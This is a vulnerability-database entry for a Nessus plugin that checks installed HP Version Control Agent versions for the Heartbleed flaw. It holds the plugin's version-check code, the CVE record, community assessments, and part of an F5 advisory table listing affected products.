HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)
2014-08-06T00:00:00
ID HP_VCA_SSRT101531.NASL Type nessus Reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2021-01-02T00:00:00
Description
The installation of HP Version Control Agent (VCA) on the remote
Windows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or 7.3.1. It is,
therefore, affected by an information disclosure vulnerability.
An out-of-bounds read error, known as the 'Heartbleed Bug', exists in
the handling of TLS heartbeat extensions. It could allow an attacker
to obtain sensitive information such as primary key material,
secondary key material, and other protected content.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
# Registration pass: when the scanner loads the plugin with `description`
# set, only the metadata below is declared and the script exits before any
# host check runs.
if (description)
{
  # Plugin identity and revision.
  script_id(77024);
  script_version("1.10");
  script_cvs_date("Date: 2019/11/25");

  # Cross-references: CVE, Bugtraq, CERT, Exploit-DB and the HP bulletin ids.
  script_cve_id("CVE-2014-0160");
  script_bugtraq_id(66690);
  script_xref(name:"CERT", value:"720951");
  script_xref(name:"EDB-ID", value:"32745");
  script_xref(name:"EDB-ID", value:"32764");
  script_xref(name:"EDB-ID", value:"32791");
  script_xref(name:"EDB-ID", value:"32998");
  script_xref(name:"HP", value:"emr_na-c04262472");
  script_xref(name:"HP", value:"HPSBMU03020");
  script_xref(name:"HP", value:"SSRT101531");

  # Title and one-line summary. The summary states the method: this is a
  # version check of the installed package, not a probe of the TLS service.
  script_name(
    english:"HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)"
  );
  script_summary(
    english:"Checks the version of the VCA package."
  );

  # Report text. The string values span several lines; their content is kept
  # exactly as written, so the continuation lines start at column 0.
  script_set_attribute(
    attribute:"synopsis",
    value:"The remote host contains software that is affected by an information
disclosure vulnerability."
  );
  script_set_attribute(
    attribute:"description",
    value:"The installation of HP Version Control Agent (VCA) on the remote
Windows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or 7.3.1. It is,
therefore, affected by an information disclosure vulnerability.
An out-of-bounds read error, known as the 'Heartbleed Bug', exists
related to handling TLS heartbeat extensions that could allow an
attacker to obtain sensitive information such as primary key material,
secondary key material, and other protected content."
  );

  # References. The first see_also is a shortened link; the comment records
  # the HP support document it stands for.
  # https://h20565.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04262472
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?d9ffb6dc");
  script_set_attribute(attribute:"see_also", value:"http://www.heartbleed.com");
  script_set_attribute(attribute:"see_also", value:"https://eprint.iacr.org/2014/140");
  script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/vulnerabilities.html#2014-0160");
  script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/secadv/20140407.txt");

  # Remediation: 7.3.2 is the first release outside the affected range.
  script_set_attribute(
    attribute:"solution",
    value:"Upgrade to VCA 7.3.2 or later."
  );

  # Scoring: CVSS v2 base vector (network, low complexity, no authentication,
  # partial confidentiality impact) and temporal vector (functional exploit,
  # official fix, confirmed report). The score source is the CVE entry.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2014-0160");

  # Exploitability flags, useful for prioritising the finding.
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"in_the_news", value:"true");

  # Timeline: disclosure, vendor patch, plugin release.
  script_set_attribute(attribute:"vuln_publication_date", value:"2014/02/24");
  script_set_attribute(attribute:"patch_publication_date", value:"2014/04/24");
  script_set_attribute(attribute:"plugin_publication_date", value:"2014/08/06");

  # Plugin type "local" and the CPE of the product the finding applies to.
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:version_control_agent");
  script_end_attributes();

  # Information-gathering category, listed under the Windows family.
  script_category(ACT_GATHER_INFO);
  script_family(english:"Windows");

  script_copyright(
    english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof."
  );

  # Scheduling: depends on the VCA install-detection plugin and requires the
  # knowledge-base key that plugin is expected to set.
  script_dependencies("hp_version_control_agent_installed.nbin");
  script_require_keys("installed_sw/HP Version Control Agent");

  # Registration is complete; nothing below runs in this pass.
  exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("install_func.inc");
# Product name: the lookup key for the recorded install and the label used
# in the audit messages.
app = "HP Version Control Agent";

# Ask the install helper to stop the plugin when no install of the product
# is recorded for this host.
get_install_count(app_name:app, exit_if_zero:TRUE);

# Fetch the recorded installs. Element 0 is the status compared with
# IF_NOT_FOUND below; element 1 holds the install records.
found = get_installs(app_name:app);
if (found[0] == IF_NOT_FOUND)
{
  audit(AUDIT_NOT_INST, app);
}

# Only one install is possible for this software, so the first record is
# the only one read.
entry = found[1][0];
path = entry["path"];
version = entry["version"];

# Without a version there is nothing to compare, so the plugin audits out
# instead of guessing.
if (version == UNKNOWN_VER)
{
  audit(AUDIT_UNKNOWN_APP_VER, app);
}
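# First release outside the affected range, shown in the report.
fix = "7.3.2";

# Affected releases per the plugin description: 7.2.0 - 7.2.2 and
# 7.3.0 - 7.3.1. The third component must be followed by the end of the
# string or by a non-digit. The earlier patterns required a literal '.'
# after it, so a version recorded with only three components (for example
# "7.3.1") fell through to the "not vulnerable" audit. Requiring a
# non-digit still keeps 7.2.10 and later out of the match.
is_affected =
  version =~ "^7\.2\.[0-2]($|[^0-9])" ||
  version =~ "^7\.3\.[0-1]($|[^0-9])";

if (is_affected)
{
  # The finding is reported on the SMB transport port recorded in the
  # knowledge base; 445 is the fallback when that key is missing.
  port = get_kb_item("SMB/transport");
  if (!port) port = 445;

  # NOTE(review): a match only shows that the installed version is in the
  # affected range. It does not show whether key material was already
  # exposed, so certificate and credential rotation after the upgrade is a
  # separate follow-up decision.
  if (report_verbosity > 0)
  {
    report =
      '\n Path : ' + path +
      '\n Installed version : ' + version +
      '\n Fixed version : ' + fix +
      '\n';
    security_warning(port:port, extra:report);
  }
  else
  {
    security_warning(port);
  }
}
else
{
  # Outside the affected range: record the install as not vulnerable.
  audit(AUDIT_INST_PATH_NOT_VULN, app, version, path);
}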
{"id": "HP_VCA_SSRT101531.NASL", "bulletinFamily": "scanner", "title": "HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)", "description": "The installation of HP Version Control Agent (VCA) on the remote\nWindows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or 7.3.1. It is,\ntherefore, affected by an information disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.", "published": "2014-08-06T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/77024", "reporter": "This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.openssl.org/news/vulnerabilities.html#2014-0160", "https://eprint.iacr.org/2014/140", "http://www.nessus.org/u?d9ffb6dc", "https://www.openssl.org/news/secadv/20140407.txt", "http://www.heartbleed.com"], "cvelist": ["CVE-2014-0160"], "type": "nessus", "lastseen": "2021-01-01T03:15:41", "edition": 27, "viewCount": 31, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-0160"]}, {"type": "f5", "idList": ["F5:K15159", "SOL15159"]}, {"type": "attackerkb", "idList": ["AKB:D165638B-97C5-4C99-BFA0-70576DB52324"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940"]}, {"type": "kitploit", "idList": ["KITPLOIT:8800200070735873517", "KITPLOIT:7942195329946074809"]}, {"type": "citrix", "idList": ["CTX140605"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30498", "SECURITYVULNS:DOC:30501", "SECURITYVULNS:DOC:30506", "SECURITYVULNS:DOC:30496", "SECURITYVULNS:DOC:30522", "SECURITYVULNS:DOC:30696", "SECURITYVULNS:DOC:30500", "SECURITYVULNS:DOC:30523", 
"SECURITYVULNS:DOC:30526", "SECURITYVULNS:DOC:30472"]}, {"type": "hackerone", "idList": ["H1:32570", "H1:49139", "H1:6475"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:151177", "PACKETSTORM:126308", "PACKETSTORM:126288", "PACKETSTORM:126072"]}, {"type": "nessus", "idList": ["ATTACHMATE_REFLECTION_X_HEARTBLEED.NASL", "MCAFEE_FIREWALL_ENTERPRISE_SB10071.NASL", "KERIO_CONNECT_824.NASL", "FEDORA_2014-5337.NASL", "HP_VCRM_SSRT101531.NASL", "SMB_KB2962393.NASL", "OPENSSL_HEARTBLEED.NASL", "FEDORA_2014-4999.NASL", "BLUECOAT_PROXY_AV_3_5_1_9.NASL", "STUNNEL_5_01.NASL"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:E5ADFE523AF247AA238C3E63EF7B0A8F", "EXPLOITPACK:1020403320036D688D074B47660E9F50"]}, {"type": "vulnerlab", "idList": ["VULNERLAB:1254"]}, {"type": "seebug", "idList": ["SSV:62188", "SSV:62241", "SSV:62192", "SSV:62182", "SSV:62189", "SSV:62185", "SSV:62180", "SSV:86019", "SSV:62198", "SSV:62086"]}, {"type": "thn", "idList": ["THN:244769C413FFA5BE647D8F6F93431B74", "THN:847F48AE6816E6BFF25355FC0EA7439A", "THN:3E9A13AAEA7FDC38D7BD8A148F19663D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310881918", "OPENVAS:1361412562310105010", "OPENVAS:1361412562310105040", "OPENVAS:1361412562310103936", "OPENVAS:1361412562310871154"]}, {"type": "symantec", "idList": ["SMNTC-1364"]}, {"type": "ics", "idList": ["ICSA-14-135-02", "ICSA-14-135-04", "ICSA-14-135-05", "ICSA-14-105-03B", "ICSA-14-105-02A"]}, {"type": "cisco", "idList": ["CISCO-SA-20140409-HEARTBLEED", "CISCO-SA-20140408-CVE-2014-0160"]}, {"type": "redhat", "idList": ["RHSA-2014:0396", "RHSA-2014:0378", "RHSA-2014:0377"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-38927", "ATLASSIAN:JRACLOUD-38927"]}, {"type": "threatpost", "idList": ["THREATPOST:15624C23F5CD5AC1029501D08A99D294"]}, {"type": "zdt", "idList": ["1337DAY-ID-22172"]}, {"type": "hp", "idList": ["HP:C04262495"]}, {"type": "centos", "idList": ["CESA-2014:0376"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2014-0160"]}], 
"modified": "2021-01-01T03:15:41", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-01-01T03:15:41", "rev": 2}, "vulnersScore": 4.5}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77024);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"HP\", value:\"emr_na-c04262472\");\n script_xref(name:\"HP\", value:\"HPSBMU03020\");\n script_xref(name:\"HP\", value:\"SSRT101531\");\n\n script_name(english:\"HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks the version of the VCA package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains software that is affected by an information\ndisclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installation of HP Version Control Agent (VCA) on the remote\nWindows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or 7.3.1. 
It is,\ntherefore, affected by an information disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.\");\n # https://h20565.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04262472\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9ffb6dc\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VCA 7.3.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:version_control_agent\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"hp_version_control_agent_installed.nbin\");\n script_require_keys(\"installed_sw/HP Version Control Agent\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = \"HP Version Control Agent\";\nget_install_count(app_name:app,exit_if_zero:TRUE);\n\n# Only one install possible for this software\ninstalls = get_installs(app_name:app);\nif (installs[0] == IF_NOT_FOUND) audit(AUDIT_NOT_INST,app);\n\ninstall = installs[1][0];\nversion = install[\"version\"];\npath = install[\"path\"];\n\n# Unknown version\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_APP_VER,app);\n\nfix = \"7.3.2\";\nif (\n version =~ \"^7\\.2\\.[0-2]\\.\" ||\n version =~ \"^7\\.3\\.[0-1]\\.\"\n)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_warning(port:port,extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app, version, path);\n", "naslFamily": "Windows", "pluginID": "77024", "cpe": ["cpe:/a:hp:version_control_agent"], "scheme": null}
{"cve": [{"lastseen": "2020-12-09T19:58:19", "description": "The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\nCVSS V2 scoring evaluates the impact of the vulnerability on the host where the vulnerability is located. When evaluating the impact of this vulnerability to your organization, take into account the nature of the data that is being protected and act according to your organization\u2019s risk acceptance. While CVE-2014-0160 does not allow unrestricted access to memory on the targeted host, a successful exploit does leak information from memory locations which have the potential to contain particularly sensitive information, e.g., cryptographic keys and passwords. Theft of this information could enable other attacks on the information system, the impact of which would depend on the sensitivity of the data and functions of that system.", "edition": 13, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2014-04-07T22:55:00", "title": "CVE-2014-0160", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": 
"NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0160"], "modified": "2020-07-28T17:11:00", "cpe": ["cpe:/a:mitel:micollab:7.2", "cpe:/o:debian:debian_linux:6.0", "cpe:/a:mitel:mivoice:1.1.2.5", "cpe:/o:siemens:simatic_s7-1500_firmware:1.5", "cpe:/o:intellian:v100_firmware:1.21", "cpe:/a:mitel:mivoice:1.1.3.3", "cpe:/o:fedoraproject:fedora:19", "cpe:/o:redhat:enterprise_linux_server_eus:6.5", "cpe:/a:mitel:micollab:7.3", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:redhat:virtualization:6.0", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/a:redhat:gluster_storage:2.1", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:siemens:simatic_s7-1500t_firmware:1.5", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:13.10", "cpe:/o:intellian:v100_firmware:1.20", "cpe:/a:mitel:mivoice:1.4.0.102", "cpe:/a:mitel:mivoice:1.3.2.2", "cpe:/o:siemens:application_processing_engine_firmware:2.0", "cpe:/a:siemens:wincc_open_architecture:3.12", "cpe:/a:mitel:mivoice:1.2.0.11", "cpe:/o:siemens:cp_1543-1_firmware:1.1", "cpe:/o:canonical:ubuntu_linux:12.10", "cpe:/o:redhat:enterprise_linux_server_aus:6.5", "cpe:/o:fedoraproject:fedora:20", "cpe:/o:intellian:v100_firmware:1.24", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/a:mitel:micollab:7.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:redhat:enterprise_linux_server_tus:6.5", "cpe:/a:mitel:micollab:6.0", "cpe:/a:mitel:micollab:7.1", "cpe:/o:intellian:v60_firmware:1.15", "cpe:/a:redhat:storage:2.1", "cpe:/a:mitel:micollab:7.3.0.104", "cpe:/o:intellian:v60_firmware:1.25", "cpe:/o:opensuse:opensuse:12.3"], "id": "CVE-2014-0160", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": 
["cpe:2.3:a:redhat:virtualization:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:19:*:*:*:*:*:*:*", "cpe:2.3:o:intellian:v60_firmware:1.15:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:12.3:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:20:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:micollab:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:intellian:v100_firmware:1.20:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:application_processing_engine_firmware:2.0:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:simatic_s7-1500_firmware:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:mivoice:1.2.0.11:*:*:*:*:skype_for_business:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:6.5:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:mivoice:1.3.2.2:*:*:*:*:skype_for_business:*:*", "cpe:2.3:a:mitel:micollab:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:mivoice:1.1.2.5:*:*:*:*:lync:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:intellian:v100_firmware:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:micollab:7.3.0.104:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:mivoice:1.4.0.102:*:*:*:*:skype_for_business:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:13.10:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:gluster_storage:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:wincc_open_architecture:3.12:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.10:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:micollab:7.1:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:cp_1543-1_firmware:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:storage:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:mivoice:1.1.3.3:*:*:*:*:skype_for_business:*:*", "cpe:2.3:a:mitel:micollab:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:6.5:*:*:*:*:*:*:*", "cpe:2.3:o:intellian:v60_firmware:1.25:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:micollab:7.0:*:*:*:*:*:*:*", 
"cpe:2.3:o:redhat:enterprise_linux_server_tus:6.5:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:simatic_s7-1500t_firmware:1.5:*:*:*:*:*:*:*", "cpe:2.3:o:intellian:v100_firmware:1.24:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2020-11-18T06:44:13", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at April 13, 2020 8:54pm UTC reported:\n\nA missing boundary check causes versions of OpenSSL 1.0.1 \u2013 1.0.1f to be vulnerable to an out of bounds read as part of an SSL Heartbeat message. This vulnerability can be leveraged without authenticating in many instances to leak sensitive information such as passwords and private keys. Due to the vulnerability being in the OpenSSL library, exploits are implementation specific and may require changes to implement the applicable protocol.\n\nThe vulnerability was fixed in [this](<https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db902>) patch.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 5**dmelcher5151** at April 15, 2020 4:14pm UTC reported:\n\nA missing boundary check causes versions of OpenSSL 1.0.1 \u2013 1.0.1f to be vulnerable to an out of bounds read as part of an SSL Heartbeat message. This vulnerability can be leveraged without authenticating in many instances to leak sensitive information such as passwords and private keys. 
Due to the vulnerability being in the OpenSSL library, exploits are implementation specific and may require changes to implement the applicable protocol.\n\nThe vulnerability was fixed in [this](<https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db902>) patch.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 5\n", "modified": "2020-07-30T00:00:00", "published": "2014-04-07T00:00:00", "id": "AKB:D165638B-97C5-4C99-BFA0-70576DB52324", "href": "https://attackerkb.com/topics/8avLg1j8ou/cve-2014-0160-aka-heartbleed", "type": "attackerkb", "title": "CVE-2014-0160 (AKA: Heartbleed)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "f5": [{"lastseen": "2020-04-06T22:39:36", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\nF5 Product Development has assigned ID 456033 (BIG-IP), ID 456302 (BIG-IP Edge Client for Windows, Mac OS, and Linux), ID 456345 (BIG-IP Edge Client for Apple iOS), and ID 468659 (Enterprise Manager) to this vulnerability. 
Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H456276 on the **Diagnostics** > **Identified** > **High** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP AAM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.4.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP AFM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.3.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Analytics | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP APM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP ASM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Edge Gateway | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | None \nBIG-IP GTM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Link Controller | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP 
PEM | 11.5.0 - 11.5.1 | 11.3.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4 | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4 | None \nARX | None | 6.0.0 - 6.4.0 | None \nEnterprise Manager | 3.1.1 HF1 - HF2 | 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0 | big3d \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | None \nBIG-IQ Cloud | None | 4.0.0 - 4.3.0 | None \nBIG-IQ Device | None | 4.2.0 - 4.3.0 | None \nBIG-IQ Security | None | 4.0.0 - 4.3.0 | None \nFirePass Clients | None | 5520-6032 | None \nBIG-IP Edge Portal for iOS | None | 1.0.0 - 1.0.3 | None \nBIG-IP Edge Portal for Android | None | 1.0.0 - 1.0.2 | None \nBIG-IP Edge Clients for Android | None | 2.0.3 - 2.0.4 | None \nBIG-IP Edge Clients for Apple iOS | 2.0.0 - 2.0.1 \n1.0.5 - 1.0.6 | 2.0.2 \n1.0.0 - 1.0.4 | VPN \nBIG-IP Edge Clients for Linux | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nBIG-IP Edge Clients for MAC OS X | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 